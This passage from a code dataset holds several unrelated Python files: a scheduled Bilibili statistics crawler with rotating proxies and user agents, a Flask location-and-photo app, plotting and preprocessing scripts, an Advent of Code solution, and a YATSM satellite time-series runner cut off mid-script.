Firefox/1.5.0.12',\n 'Opera/9.27 (Windows NT 5.2; U; zh-cn)',\n 'Mozilla/5.0 (Macintosh; PPC Mac OS X; U; en) Opera 8.0',\n 'Opera/8.0 
(Macintosh; PPC Mac OS X; U; en)',\n 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080219 Firefox/2.0.0.12 Navigator/9.0.0.6',\n 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0)',\n 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)',\n 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E)',\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Maxthon/4.0.6.2000 Chrome/26.0.1410.43 Safari/537.1 ',\n 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E; QQBrowser/7.3.9825.400)',\n 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0 ',\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.92 Safari/537.1 LBBROWSER',\n 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; BIDUBrowser 2.x)',\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.11 TaoBrowser/3.0 Safari/536.11']\n header = {\n 'Connection':head_connection[random.randrange(0,len(head_connection))],\n 'Accept':head_accept[0],\n 'Accept-Language':head_accept_language[random.randrange(0,len(head_accept_language))],\n 'User-Agent':head_user_agent[random.randrange(0,len(head_user_agent))],\n } #获得随机请求头\n return header\n\nproxies = ['125.66.217.114:6675','112.251.161.82:6675',\n'117.34.253.157:6675','113.94.72.209:6666',\n'114.105.217.144:6673','125.92.110.80:6675',\n'112.235.126.55:6675','14.148.99.188:6675',\n'112.240.161.20:6668','122.82.160.148:6675',\n'175.30.224.66:6675']\n\ndef request_proxie():\n header1 = requests_headers () # 获得随机请求头\n proxie_handler = urllib.request.ProxyHandler({'http':random.choice(proxies)})\n opener = urllib.request.build_opener(proxie_handler)\n header = []\n for key,value in header1.items():\n elem = (key,value)\n header.append(elem)\n opener.addheaders = header\n return opener\n\ndef bcrawl():\n \n '''\n proxies = [\"125.66.217.114:6675\"\n ,\"112.251.161.82:6675\"\n# '117.34.253.157:6675','113.94.72.209:6666',\n# '114.105.217.144:6673','125.92.110.80:6675',\n# '112.235.126.55:6675','14.148.99.188:6675',\n# '112.240.161.20:6668','122.82.160.148:6675',\n# '175.30.224.66:6675'\\\n ]'''\n Time = datetime.datetime.now().strftime('%m-%d %H')\n print(Time,\"start Crawling....\")\n uplist=open('uplist.csv','r',encoding='utf-8')\n res=open('{}.csv'.format(Time), 'w',encoding=\"utf-8\")\n # uplist=open('D:\\\\1myfolder\\\\Ratatouille\\\\citiBank\\\\BiliCrawler\\\\a.csv','w')\n # res=open('D:\\\\1myfolder\\\\Ratatouille\\\\citiBank\\\\BiliCrawler\\\\res.csv', 'w',encoding=\"utf-8\")\n print(\"uid,Time,FanNum,PlayNum,ChargeNum\",file=res)\n opener = request_proxie()\n iter=0\n for line in islice(uplist, 1, None):\n #print(uplist.read())\n Time=datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n Nocharge=0\n NoPlayNum=0\n i=line.split(', ')[0].strip(' ')\n print(iter)\n Fanurl=\"https://api.bilibili.com/x/relation/stat?vmid={}&jsonp=jsonp\".format(i)\n Playurl=\"https://api.bilibili.com/x/space/upstat?mid={}&jsonp=jsonp\".format(i)\n Chargeurl=\"https://elec.bilibili.com/api/query.rank.do?mid={}&type=jsonp&jsonp=jsonp\".format(i)\n headers = {'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/75.0.3770.100 Safari/537.36' }\n \n # proxy_support = request.ProxyHandler(proxies)\n # #创建Opener\n # opener = request.build_opener(proxy_support)\n # #添加User Angent\n # opener.addheaders = [('Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36')]\n # #安装OPener\n # request.install_opener(opener)\n # #使用自己安装好的Opener\n # response = request.urlopen(Fanurl)\n\n r = opener.open(Fanurl)\n Fanjson = r.read().decode('utf-8')\n dic_page = json.loads(Fanjson)\n\n FanNum=dic_page['data']['follower']\n # print(\"fan\",FanNum)\n try:\n # response = requests.get(Playurl,headers=headers)\n #print(\"test\")\n response = opener.open(Playurl)\n Playjson = response.read().decode('utf-8')\n dic_page = json.loads(Playjson)\n PlayNum=dic_page['data']['archive']['view']\n # print(\"play\",PlayNum)\n\n except:\n NoPlayNum=1\n\n try:\n response = opener.open(Chargeurl)\n # response = requests.get(Chargeurl,proxies=proxies)\n r = response.read().decode('utf-8')\n Chargejson = json.loads(r.replace('(','')[4:-1])\n ChargeNum=Chargejson['data']['count']\n # print(ChargeNum)\n except:\n Nocharge=1\n\n if Nocharge==0 and NoPlayNum==0:\n print(i,\",\",Time,\",\",FanNum,\",\",PlayNum,\",\",ChargeNum,file=res)\n elif Nocharge==1:\n print(i,\",\",Time,\",\",FanNum,\",\",PlayNum,\",\",file=res)\n else:\n print(\"no play and charge: \",i)\n print(i,\",\",Time,\",\",FanNum,\",\",file=res)\n iter+=1\n # if iter==100 or iter==500 or iter==1000 or iter==1500 or iter==2000 or iter==2500:\n # print(\"iter: \",iter)\n if iter%100==0:\n print(\"iter: \",iter)\n #if iter==1:\n # break\n res.close()\n\ndef job():\n # start=time.time()\n p = Process(target=bcrawl)\n p.start()\n p.join()\n\ndef main():\n # schedule.every(1).hour.do(job)\n # schedule.every(1).minutes.do(job)\n schedule.every().day.at(\"00:00:01\").do(job)\n # schedule.every().day.at(\"01:00:00\").do(job)\n # schedule.every().day.at(\"02:00:00\").do(job)\n schedule.every().day.at(\"03:00:00\").do(job)\n # schedule.every().day.at(\"04:00:00\").do(job)\n # schedule.every().day.at(\"05:00:00\").do(job)\n schedule.every().day.at(\"06:00:00\").do(job)\n # schedule.every().day.at(\"07:00:00\").do(job)\n # schedule.every().day.at(\"08:00:00\").do(job)\n schedule.every().day.at(\"09:00:00\").do(job)\n # schedule.every().day.at(\"10:00:00\").do(job)\n # schedule.every().day.at(\"11:00:00\").do(job)\n schedule.every().day.at(\"12:00:00\").do(job)\n # schedule.every().day.at(\"13:00:00\").do(job)\n # schedule.every().day.at(\"14:00:00\").do(job)\n schedule.every().day.at(\"15:00:00\").do(job)\n # schedule.every().day.at(\"16:00:00\").do(job)\n # schedule.every().day.at(\"17:00:00\").do(job)\n schedule.every().day.at(\"18:00:00\").do(job)\n # schedule.every().day.at(\"19:00:00\").do(job)\n # schedule.every().day.at(\"20:00:00\").do(job)\n schedule.every().day.at(\"21:00:00\").do(job)\n # schedule.every().day.at(\"22:00:00\").do(job)\n # schedule.every().day.at(\"23:00:00\").do(job)\n\n\n # schedule.every().day.at(\"13:34:00\").do(job)\n\n\n while True:\n schedule.run_pending()\n time.sleep(1)\n\nif __name__ == '__main__':\n main()\n\n \n\n\n","sub_path":"CrawlandFollowUpInfo.py","file_name":"CrawlandFollowUpInfo.py","file_ext":"py","file_size_in_byte":8890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"483105089","text":"\r\nf = open('C:/Users/txt/Desktop/match/huawei/car.txt')\r\nfile2 = open(\"C:/Users/txt/Desktop/match/huawei/new_car.txt\",'w')\r\nfor line in 
f.readlines():\r\n    # blank lines are written out empty; lines containing '#' are skipped\r\n    if line == '\\n':\r\n        line = line.strip('\\n')\r\n    if '#' in line:\r\n        continue\r\n    file2.write(line)\r\nf.close()\r\nfile2.close()\r\n\r\n#(id,from,to,speed,planTime)\r\n\r\n\r\n# class car_set():\r\n#     def __init__(self):\r\n#         pass\r\n#     def car_list(self):\r\n#         carlist = []\r\n#         while True:\r\n#             line = f.readline()\r\n#             #print(line)\r\n#             if line:\r\n#                 road_id =line.split(',')[0].strip().strip('(')\r\n#                 #print(road_id)\r\n#                 start_node = int(line.split(',')[4])\r\n#                 end_node = int(line.split(',')[5])\r\n#                 speed_limit = int(line.split(',')[2])\r\n#                 nodelist.append(start_node)\r\n#                 nodelist = list(set(nodelist))\r\n#                 #print (nodelist)\r\n#                 g.add_nodes_from(nodelist)\r\n#                 weight = float(int(line.split(',')[1]))\r\n#                 is_double = line.split(',')[6].strip().strip(')')\r\n#                 if is_double =='1':\r\n#                     g.add_edges_from([(start_node,end_node,{'weight':weight,'speed_limit':speed_limit,'road_id':road_id}),(end_node,start_node,{'weight':weight,'speed_limit':speed_limit,'road_id':road_id})])\r\n#                     #print ('double')\r\n#                 else :\r\n#                     g.add_edges_from([(start_node,end_node,{'weight':weight,'speed_limit':speed_limit,'road_id':road_id})])\r\n#                 # g.add_weighted_edges_from([(start_node,end_node,weight)])\r\n#                     #print ('not')\r\n#             else :\r\n#                 break\r\n#         #nx.draw_networkx(g,arrows=True,with_labels=True)\r\n#         #plt.show()\r\n#         return g\r\n#\r\n#     # neighbor = []\r\n#     #print (g.number_of_edges())\r\n#     for i in nx.all_neighbors(g,1):\r\n#         neighbor.append(i)\r\n#     neighbor = list(sorted(set(neighbor)))\r\n#     print (neighbor[-1])\r\n\r\n#nx.draw_networkx(g,arrows=True,with_labels=True)\r\n#plt.show()\r\n","sub_path":"preprocess_cars.py","file_name":"preprocess_cars.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"1452704","text":"import json\nfrom utilities import Common\nfrom flask import Flask, render_template, request, redirect, url_for\n\napp = Flask(__name__)\napp.debug = True\nparsed_locations = json.load(open('locations.json'))['locations']\n\n\n@app.route('/', methods=['GET'])\ndef dropdown():\n    \"\"\"method to fill dropdown\"\"\"\n    locations = Common().load(parsed_locations)\n    return render_template('index.html', locations_data=locations)\n\n\n@app.route('/add', methods=['GET'])\ndef add_location():\n    \"\"\"method to add a location\"\"\"\n    lat = request.args.get('latitude')\n    long = request.args.get('longitude')\n    name = request.args.get('name')\n    json_object = {\n        \"name\": name,\n        \"latitude\": lat,\n        \"longitude\": long,\n    }\n    with open('locations.json') as f:\n        data = json.load(f)\n    if not any(d['name'] == name for d in data['locations']):\n        data[\"locations\"].append(json_object)\n        with open('locations.json', 'w') as f:\n            json.dump(data, f)\n            f.close()\n    locations = Common().load(data['locations'])\n    return render_template('index.html', locations_data=locations)\n\n\n@app.route(\"/getphotos/<pagenumber>/\", methods=['GET'])\ndef getPhotos(pagenumber):\n    \"\"\"method to search photos by location\"\"\"\n    location = request.args.get('locations')\n    if request.args.get('locations') is not None:\n        parsed_locations = json.load(open('locations.json'))['locations']\n        lat = [item['latitude'] for item in parsed_locations if item['name'] == location]\n        long = [item['longitude'] for item in parsed_locations if item['name'] == location]\n    else:\n        lat = request.args.get('latitude')\n        long = request.args.get('longitude')\n\n    if request.args.get('favorite'):\n        # method to add favorites\n        
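# Common.favorites lives in utilities.py, which is not shown here; a\n        # plausible sketch (assumed signature and behavior), mirroring the\n        # locations.json update pattern in add_location above:\n        #\n        #     def favorites(self, fav_latitude, fav_longitude):\n        #         with open('favorites.json') as f:\n        #             data = json.load(f)\n        #         entry = {'latitude': fav_latitude, 'longitude': fav_longitude}\n        #         if entry not in data['favorites']:\n        #             data['favorites'].append(entry)\n        #             with open('favorites.json', 'w') as f:\n        #                 json.dump(data, f)\n        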
Common().favorites(fav_latitude=lat, fav_longitude=long)\n\n data = Common().flickr(lat, long, pagenumber)\n geo = {\n 'latitude': lat,\n 'longitude': long,\n 'location': location\n }\n if \"photo\" in data:\n for item in data[\"photo\"]:\n item[\"url\"] = 'http://farm' + str(item['farm']) + '.static.flickr.com/' + item['server'] + '/' + \\\n str(item['id']) + '_' + item['secret'] + '_m.jpg'\n return render_template('images.html', photos_data=data[\"photo\"], page=data[\"page\"], geo=geo)\n else:\n return render_template('images.html', message=data, page=0, geo=geo)\n\n\n@app.route('/favorites', methods=['GET'])\ndef favorite():\n \"\"\"method to view favorites\"\"\"\n with open('favorites.json') as f:\n fav_json = json.load(f)\n fav_lst = list(fav_json['favorites'])\n f.close()\n return render_template('favorites.html', fav=fav_lst)\n\n\nif __name__ == \"__main__\":\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"577027170","text":"import pandas as pd\nimport seaborn as sns\nfrom matplotlib import pyplot as plt\n\n\ndef select_answers():\n answer_df = pd.read_csv(\"ktlint_answer_score_error.csv\", encoding='utf8')\n\n return answer_df\n\n\ndef select_questions():\n question_df = pd.read_csv(\"ktlint_question_score_error.csv\", encoding='utf8')\n\n return question_df\n\n\ndef plot_boxplot(data, file_name):\n ax = sns.boxplot(x=\"popularity\", y=\"total_errors\", hue=\"popularity\", data=data, showfliers=False)\n plt.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0., prop={'size': 15})\n plt.xlabel(\"Popularity\", fontsize=15)\n plt.ylabel(\"Errors\", fontsize=15)\n plt.savefig(file_name)\n plt.show()\n\n\ndef main():\n answer_df = select_answers()\n question_df = select_questions()\n plot_boxplot(answer_df, \"ktlint_answer_popularity.png\")\n plot_boxplot(question_df, 'ktlint_question_popularity.png')\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"StatisticalAnalysis/Ktlint/ktlint_analysis.py","file_name":"ktlint_analysis.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"344842558","text":"\nclass Calculator :\n def __init__(self):\n self.a = 0\n self.b = 0\n self.result= 0\n\n def add(self,a,b):\n self.a = a\n self.b = b\n self.result = self.a + self.b\n return self.result\n\n def div(self,a,b):\n if b == 0:\n raise Exception\n else:\n self.a = a\n self.b = b\n self.result = self.a / self.b\n return self.result\n","sub_path":"test_pytest_first_day/calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"446784299","text":"\"\"\"\n--- Day 3: No Matter How You Slice It ---\nThe Elves managed to locate the chimney-squeeze prototype fabric for Santa's suit \n(thanks to someone who helpfully wrote its box IDs on the wall of the warehouse in \nthe middle of the night). Unfortunately, anomalies are still affecting them - nobody \ncan even agree on how to cut the fabric.\n\nThe whole piece of fabric they're working on is a very large square - at least 1000 inches on each side.\n\nEach Elf has made a claim about which area of fabric would be ideal for Santa's suit. \nAll claims have an ID and consist of a single rectangle with edges parallel to the edges \nof the fabric. 
Each claim's rectangle is defined as follows:\n\nThe number of inches between the left edge of the fabric and the left edge of the rectangle.\nThe number of inches between the top edge of the fabric and the top edge of the rectangle.\nThe width of the rectangle in inches.\nThe height of the rectangle in inches.\nA claim like #123 @ 3,2: 5x4 means that claim ID 123 specifies a rectangle 3 inches \nfrom the left edge, 2 inches from the top edge, 5 inches wide, and 4 inches tall. \nVisually, it claims the square inches of fabric represented by # (and ignores the square \ninches of fabric represented by .) in the diagram below:\n\n...........\n...........\n...#####...\n...#####...\n...#####...\n...#####...\n...........\n...........\n...........\nThe problem is that many of the claims overlap, causing two or more claims to cover part of the same areas. For example, consider the following claims:\n\n#1 @ 1,3: 4x4\n#2 @ 3,1: 4x4\n#3 @ 5,5: 2x2\nVisually, these claim the following areas:\n\n........\n...2222.\n...2222.\n.11XX22.\n.11XX22.\n.111133.\n.111133.\n........\nThe four square inches marked with X are claimed by both 1 and 2. (Claim 3, while adjacent to the others, does not overlap either of them.)\n\nIf the Elves all proceed with their own plans, none of them will have enough fabric. How many square inches of fabric are within two or more claims?\n\"\"\"\n\nimport numpy as np\nimport re\n\ngrid = np.zeros((1000,1000))\n\n\nfile = open(\"AOTC2018_3.txt\")\n\ndata = [x.strip() for x in file]\n\n\nget_coordinates = re.compile(\"\\d*,\\d*\")\nget_size\t\t= re.compile(\"\\d*x\\d*\")\n\n\nfor i in range(len(data)):\n\tm_coord = re.search(get_coordinates, data[i])\n\tm_size = re.search(get_size, data[i])\n\tif m_coord and m_size:\n\t\t# print(m_coord.group(0))\n\t\t# print(m_size.group(0))\n\n\t\tx_coord = int(str(m_coord.group(0))[:str(m_coord.group(0)).find(\",\")])\n\t\ty_coord = int(str(m_coord.group(0))[str(m_coord.group(0)).find(\",\")+1:])\n\t\t# print(x_coord)\n\t\t# print(y_coord)\n\n\t\tx_size = int(str(m_size.group(0))[:str(m_size.group(0)).find(\"x\")])\n\t\ty_size = int(str(m_size.group(0))[str(m_size.group(0)).find(\"x\")+1:])\n\t\t# print(x_size)\n\t\t# print(y_size)\n\n\t\tgrid[x_coord:x_coord+x_size, y_coord:y_coord+y_size] += 1\n\n\nprint(len(grid[grid>1]))\n\n# Your puzzle answer was 111935.","sub_path":"2018/AOTC2018_3_1.py","file_name":"AOTC2018_3_1.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"471714558","text":"#!/usr/bin/env python\n\"\"\" Yet Another Timeseries Model (YATSM) - run script for lines of images\n\nUsage: line_yatsm.py [options] <config_file> <job_number> <total_jobs>\n\nOptions:\n    --check                     Check that images exist\n    --check_cache               Check that cache file contains matching data\n    --resume                    Do not overwrite pre-existing results\n    --do-not-run                Don't run YATSM (useful for just caching data)\n    -v --verbose                Show verbose debugging messages\n    --verbose-yatsm             Show verbose debugging messages in YATSM\n    -q --quiet                  Show only error messages\n    --version                   Print program version and exit\n    -h --help                   Show help\n\n\"\"\"\nfrom __future__ import division, print_function\n\nimport logging\nimport os\nimport sys\nimport time\n\nfrom docopt import docopt\nimport numpy as np\nimport patsy\n\n# Handle running as installed module or not\ntry:\n    from yatsm.version import __version__\nexcept ImportError:\n    # Try adding `pwd` to PYTHONPATH\n    sys.path.append(os.path.dirname(os.path.dirname(\n        os.path.abspath(__file__))))\n    from 
yatsm.version import __version__\nfrom yatsm.cache import (get_line_cache_name, test_cache, read_cache_file,\n write_cache_file)\nfrom yatsm.config_parser import parse_config_file\nimport yatsm._cyprep as cyprep\nfrom yatsm.errors import TSLengthException\nfrom yatsm.utils import (calculate_lines, get_output_name, get_image_IDs,\n csvfile_to_dataset, make_X)\nfrom yatsm.reader import get_image_attribute, read_row_BIP, read_row_GDAL\nfrom yatsm.yatsm import YATSM\nfrom yatsm.regression.transforms import harm\n\n# Log setup for runner\nFORMAT = '%(asctime)s:%(levelname)s:%(module)s.%(funcName)s:%(message)s'\nlogging.basicConfig(format=FORMAT, level=logging.INFO, datefmt='%H:%M:%S')\nlogger = logging.getLogger('yatsm')\n\n# Logging level for YATSM\nloglevel_YATSM = logging.WARNING\n\n\ndef read_line(line, images, image_IDs, dataset_config,\n ncol, nband, dtype,\n read_cache=False, write_cache=False, validate_cache=False):\n \"\"\" Reads in dataset from cache or images if required\n\n Args:\n line (int): line to read in from images\n images (list): list of image filenames to read from\n image_IDs (iterable): list image identifying strings\n dataset_config (dict): dictionary of dataset configuration options\n ncol (int): number of columns\n nband (int): number of bands\n dtype (type): NumPy datatype\n read_cache (bool, optional): try to read from cache directory\n (default: False)\n write_cache (bool, optional): try to to write to cache directory\n (default: False)\n validate_cache (bool, optional): validate that cache data come from same\n images specified in `images` (default: False)\n\n Returns:\n Y (np.ndarray): 3D array of image data (nband, n_image, n_cols)\n\n \"\"\"\n start_time = time.time()\n\n read_from_disk = True\n cache_filename = get_line_cache_name(\n dataset_config, len(images), line, nband)\n\n Y_shape = (nband, len(images), ncol)\n\n if read_cache:\n Y = read_cache_file(cache_filename,\n image_IDs if validate_cache else None)\n if Y is not None and Y.shape == Y_shape:\n logger.debug('Read in Y from cache file')\n read_from_disk = False\n elif Y is not None and Y.shape != Y_shape:\n logger.warning(\n 'Data from cache file does not meet size requested '\n '({y} versus {r})'.format(y=Y.shape, r=Y_shape))\n\n if read_from_disk:\n # Read in Y\n if dataset_config['use_bip_reader']:\n # Use BIP reader\n logger.debug('Reading in data from disk using BIP reader')\n Y = read_row_BIP(images, line, (ncol, nband), dtype)\n else:\n # Read in data just using GDAL\n logger.debug('Reading in data from disk using GDAL')\n Y = read_row_GDAL(images, line)\n\n logger.debug('Took {s}s to read in the data'.format(\n s=round(time.time() - start_time, 2)))\n\n if write_cache and read_from_disk:\n logger.debug('Writing Y data to cache file {f}'.format(\n f=cache_filename))\n write_cache_file(cache_filename, Y, image_IDs)\n\n return Y\n\n\n# Runner\ndef run_line(line, X, images, image_IDs,\n dataset_config, yatsm_config,\n nrow, ncol, nband, dtype,\n do_not_run=False,\n read_cache=False, write_cache=False,\n validate_cache=False):\n \"\"\" Runs YATSM for a line\n\n Args:\n line (int): line to be run from image\n dates (ndarray): np.array of X feature from ordinal dates\n images (ndarray): np.array of image filenames\n image_IDs (iterable): list image identifying strings\n dataset_config (dict): dict of dataset configuration options\n yatsm_config (dict): dict of YATSM algorithm options\n nrow (int): number of rows\n ncol (int): number of columns\n nband (int): number of bands\n dtype (type): NumPy 
datatype\n do_not_run (bool, optional): don't run YATSM\n read_cache (bool, optional): try to read from cache directory\n (default: False)\n write_cache (bool, optional): try to to write to cache directory\n (default: False)\n validate_cache (bool, optional): ensure data from cache file come from\n images specified in configuration (default: False)\n\n\n \"\"\"\n # Setup output\n output = []\n\n Y = read_line(line, images, image_IDs, dataset_config,\n ncol, nband, dtype,\n read_cache=read_cache, write_cache=write_cache,\n validate_cache=validate_cache)\n\n if do_not_run:\n return\n\n # About to run YATSM\n logger.debug(' running YATSM')\n # Raise or lower logging level for YATSM\n _level = logger.level\n logger.setLevel(loglevel_YATSM)\n\n for c in xrange(Y.shape[-1]):\n try:\n result = run_pixel(X, Y[..., c], dataset_config, yatsm_config,\n px=c, py=line)\n except TSLengthException:\n continue\n\n output.extend(result)\n\n # Return logging level\n logger.setLevel(_level)\n\n # Save output\n outfile = get_output_name(dataset_config, line)\n logger.debug(' saving YATSM output to {f}'.format(f=outfile))\n\n np.savez(outfile,\n version=__version__,\n consecutive=yatsm_config['consecutive'],\n threshold=yatsm_config['threshold'],\n min_obs=yatsm_config['min_obs'],\n min_rmse=yatsm_config['min_rmse'],\n test_indices=yatsm_config['test_indices'],\n design=yatsm_config['design_matrix'],\n design_matrix=X.design_info.column_name_indexes,\n retrain_time=yatsm_config['retrain_time'],\n screening=yatsm_config['screening'],\n screening_crit=yatsm_config['screening_crit'],\n remove_noise=yatsm_config['remove_noise'],\n dynamic_rmse=yatsm_config['dynamic_rmse'],\n commission_alpha=yatsm_config['commission_alpha'],\n reverse=yatsm_config['reverse'],\n robust=yatsm_config['robust'],\n lassocv=yatsm_config['lassocv'],\n record=np.array(output))\n\n\ndef run_pixel(X, Y, dataset_config, yatsm_config, px=0, py=0):\n \"\"\" Run a single pixel through YATSM\n\n Args:\n X (ndarray): 2D (nimage x nband) feature input from ordinal date\n Y (ndarray): 2D (nband x nimage) image input\n dataset_config (dict): dict of dataset configuration options\n yatsm_config (dict): dict of YATSM algorithm options\n px (int, optional): X (column) pixel reference\n py (int, optional): Y (row) pixel reference\n\n Returns:\n model_result (ndarray): NumPy array of model results from YATSM\n\n \"\"\"\n # Extract design info\n design_info = X.design_info\n # Continue if valid observations are less than 50% of dataset\n valid = cyprep.get_valid_mask(\n Y[:dataset_config['mask_band'] - 1, :],\n dataset_config['min_values'],\n dataset_config['max_values']\n )\n if valid.sum() < Y.shape[1] / 2.0:\n raise TSLengthException('Not enough valid observations')\n\n # Otherwise continue with masked values\n valid = (valid * np.in1d(Y[dataset_config['mask_band'] - 1, :],\n dataset_config['mask_values'],\n invert=True)).astype(np.bool)\n\n Y = Y[:dataset_config['mask_band'] - 1, valid]\n X = X[valid, :]\n\n if yatsm_config['reverse']:\n # TODO: do this earlier\n X = np.flipud(X)\n Y = np.fliplr(Y)\n\n yatsm = YATSM(X, Y,\n consecutive=yatsm_config['consecutive'],\n threshold=yatsm_config['threshold'],\n min_obs=yatsm_config['min_obs'],\n min_rmse=yatsm_config['min_rmse'],\n test_indices=yatsm_config['test_indices'],\n retrain_time=yatsm_config['retrain_time'],\n screening=yatsm_config['screening'],\n screening_crit=yatsm_config['screening_crit'],\n green_band=dataset_config['green_band'] - 1,\n swir1_band=dataset_config['swir1_band'] - 1,\n 
remove_noise=yatsm_config['remove_noise'],\n dynamic_rmse=yatsm_config['dynamic_rmse'],\n slope_test=yatsm_config['slope_test'],\n lassocv=yatsm_config['lassocv'],\n design_info=design_info,\n px=px,\n py=py,\n logger=logger)\n yatsm.run()\n\n if yatsm_config['commission_alpha']:\n yatsm.record = yatsm.commission_test(yatsm_config['commission_alpha'])\n\n if yatsm_config['robust']:\n yatsm.record = yatsm.robust_record\n\n if yatsm_config['calc_pheno']:\n ltm = pheno.LongTermMeanPhenology(\n yatsm,\n yatsm_config['red_index'], yatsm_config['nir_index'],\n yatsm_config['blue_index'], yatsm_config['scale'],\n yatsm_config['evi_index'], yatsm_config['evi_scale'])\n yatsm.record = ltm.fit(year_interval=yatsm_config['year_interval'],\n q_min=yatsm_config['q_min'],\n q_max=yatsm_config['q_max'])\n\n return yatsm.record\n\n\ndef main(dataset_config, yatsm_config,\n check=False, resume=False,\n do_not_run=False,\n read_cache=False, write_cache=False,\n validate_cache=False):\n \"\"\" Read in dataset and YATSM for a complete line\n\n Args:\n dataset_config (dict): dict of dataset configuration options\n yatsm_config (dict): dict of YATSM algorithm options\n check (bool, optional): check to make sure images are readible\n resume (bool, optional): do not overwrite existing results, instead\n continue from first non-existing result file\n do_not_run (bool, optional): Don't run YATSM\n read_cache (bool, optional): try to read from cache directory\n (default: False)\n write_cache (bool, optional): try to to write to cache directory\n (default: False)\n validate_cache (bool, optional): ensure data from cache file come from\n images specified in configuration (default: False)\n\n \"\"\"\n # Read in dataset\n dates, sensors, images = csvfile_to_dataset(\n dataset_config['input_file'],\n date_format=dataset_config['date_format']\n )\n\n image_IDs = get_image_IDs(images)\n\n # Check for existence of files and remove missing\n if check:\n to_delete = []\n for i, img in enumerate(images):\n if not os.path.isfile(img):\n logger.warning('Could not find file {f} -- removing'.\n format(f=img))\n to_delete.append(i)\n\n if len(to_delete) == 0:\n logger.debug('Checked and found all input images')\n else:\n logger.warning('Removing {n} images'.format(n=len(to_delete)))\n dates = np.delete(dates, np.array(to_delete))\n images = np.delete(images, np.array(to_delete))\n\n # Get attributes of one of the images\n nrow, ncol, nband, dtype = get_image_attribute(images[0])\n\n # Calculate the lines this job ID works on\n job_lines = calculate_lines(job_number, total_jobs, nrow)\n logger.debug('Responsible for lines: {l}'.format(l=job_lines))\n\n # Calculate X feature input\n X = patsy.dmatrix(yatsm_config['design_matrix'],\n {'x': dates, 'sensor': sensors})\n\n # Start running YATSM\n start_time_all = time.time()\n logger.info('Starting to run lines')\n for job_line in job_lines:\n if resume:\n try:\n z = np.load(get_output_name(dataset_config, job_line))\n except:\n pass\n else:\n del z\n logger.debug('Already processed line {l}'.format(l=job_line))\n continue\n\n logger.debug('Running line {l}'.format(l=job_line))\n start_time = time.time()\n\n try:\n run_line(job_line, X, images, image_IDs,\n dataset_config, yatsm_config,\n nrow, ncol, nband, dtype,\n do_not_run=do_not_run,\n read_cache=read_cache, write_cache=write_cache,\n validate_cache=validate_cache)\n except Exception as e:\n logger.error('Could not process line {l}'.format(l=job_line))\n logger.error(type(e))\n logger.error(str(e))\n\n logger.debug('Took {s}s to 
run'.format(\n            s=round(time.time() - start_time, 2)))\n\n    logger.info('Completed {n} lines in {m} minutes'.format(\n        n=len(job_lines),\n        m=round((time.time() - start_time_all) / 60.0, 2)\n    ))\n\n\nif __name__ == '__main__':\n    # Get arguments\n    args = docopt(__doc__, version=__version__)\n\n    # Validate input arguments\n    config_file = args['<config_file>']\n    if not os.path.isfile(args['<config_file>']):\n        print('Error - specified <config_file> is not a file')\n        sys.exit(1)\n\n    try:\n        job_number = int(args['<job_number>'])\n    except:\n        print('Error - <job_number> must be an integer greater than 0')\n        sys.exit(1)\n    if job_number <= 0:\n        print('Error - <job_number> cannot be less than or equal to 0')\n        sys.exit(1)\n    job_number -= 1\n\n    try:\n        total_jobs = int(args['<total_jobs>'])\n    except:\n        print('Error - <total_jobs> must be an integer')\n        sys.exit(1)\n\n    # Check for existence of images? for cache file validity?\n    check = args['--check']\n    check_cache = args['--check_cache']\n\n    # Resume?\n    resume = False\n    if args['--resume']:\n        resume = True\n\n    do_not_run = args['--do-not-run']\n\n    # Setup logger\n    if args['--verbose']:\n        logger.setLevel(logging.DEBUG)\n\n    if args['--verbose-yatsm']:\n        loglevel_YATSM = logging.DEBUG\n\n    if args['--quiet']:\n        loglevel_YATSM = logging.WARNING\n        logger.setLevel(logging.WARNING)\n\n    # Parse and validate configuration file\n    dataset_config, yatsm_config = parse_config_file(config_file)\n\n    # Import phenology stuff only if necessary since it relies on rpy2 / R\n    if yatsm_config['calc_pheno'] and not do_not_run:\n        import yatsm.phenology as pheno\n\n    # Make output directory\n    try:\n        os.makedirs(dataset_config['output'])\n    except 